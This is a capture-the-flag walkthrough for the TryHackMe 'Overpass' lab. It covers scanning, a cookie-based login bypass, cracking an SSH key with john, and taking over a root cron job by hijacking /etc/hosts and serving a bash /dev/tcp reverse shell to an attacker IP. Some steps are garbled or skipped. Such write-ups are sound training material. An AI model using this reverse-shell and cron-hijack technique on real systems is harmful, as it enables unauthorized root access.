Room Link : https://tryhackme.com/room/overpass
STEP1
nmap -p- -sSV 10.10.101.201 -Pn -A -T4
FINDING
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
-----------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.101.201/
FINDING
== DIRECTORY: http://10.10.101.201/aboutus/
+ http://10.10.101.201/admin (CODE:301|SIZE:42)
== DIRECTORY: http://10.10.101.201/css/
== DIRECTORY: http://10.10.101.201/downloads/
== DIRECTORY: http://10.10.101.201/img/
+ http://10.10.101.201/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/aboutus/ ----
+ http://10.10.101.201/aboutus/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/css/ ----
+ http://10.10.101.201/css/index.html (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/downloads/ ----
+ http://10.10.101.201/downloads/index.html (CODE:301|SIZE:0)
+ http://10.10.101.201/downloads/src (CODE:301|SIZE:0)
---- Entering directory: http://10.10.101.201/img/ ----
+ http://10.10.101.201/img/index.html (CODE:301|SIZE:0)
-----------------------------------------------------------------------------------------------
STEP3
http://10.10.101.201/admin
moniter the source you will see a login.js file in the source
open the login.js file and read it
FINDING
async function login() {
const usernameBox = document.querySelector("#username");
const passwordBox = document.querySelector("#password");
const loginStatus = document.querySelector("#loginStatus");
loginStatus.textContent = ""
const creds = { username: usernameBox.value, password: passwordBox.value }
const response = await postData("/api/login", creds)
const statusOrCookie = await response.text()
if (statusOrCookie === "Incorrect credentials") {
loginStatus.textContent = "Incorrect Credentials"
passwordBox.value=""
} else {
Cookies.set("SessionToken",statusOrCookie)
window.location = "/admin"
}
}
if we set the Cookies.set("SessionToken",statusOrCookie)
then we can login
-----------------------------------------------------------------------------------------------
STEP4
install cookie editer
https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/?utm_campaign=external-cookie-editor.com
install it and add extention to the browser
add the cookie Cookies.set("SessionToken",statusOrCookie)
refresh the login page and you willbe loged in
-----------------------------------------------------------------------------------------------
STEP5
copy the key in a file called "ovp.txt" and use ssh2john to convert it into hash for the user "James"
cd /usr/share/john
./ssh2john.py /root/Desktop/ovp.txt /root/Desktop/ovpcrack
john /root/Desktop/ovpcrack --wordlist=/usr/share/wordlists/rockyou.txt
FINDING
james13
-----------------------------------------------------------------------------------------------
STEP6
rename ovp.txt to ovp
chmod 600 ovp
ssh [email protected] -i ovp
with password : james13
-----------------------------------------------------------------------------------------------
STEP7
ls -la
cat user.txt
FINDING
thm{65c1aaf000506e56996822c6281e6bf7}
-----------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
-----------------------------------------------------------------------------------------------
STEP9
nano /etc/hosts
10.17.65.196 overpass.thm
ip will be attacker ip
save it
ctrl+x
ctrl+y
enter
-----------------------------------------------------------------------------------------------
STEP10
on attacker machine create folder on desktop
/download/src/buildscript.sh
write in buildscript.sh
#!/bin/bash
bash -c "bash -i & /dev/tcp/10.6.63.158/4444 0&1" -- ip will be of attacker ip
save it
-----------------------------------------------------------------------------------------------
STEP11
start a python server on attacker desktop
python3 -m http.server 80
open a nc listner on new terminal
nc -nvlp 4444
wait for few mins you will get a revers shell on new terminal which will be root
-----------------------------------------------------------------------------------------------
STEP12
on new terminal
ls -la
cat root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}
whoami
root
-----------------------------------------------------------------------------------------------
|
|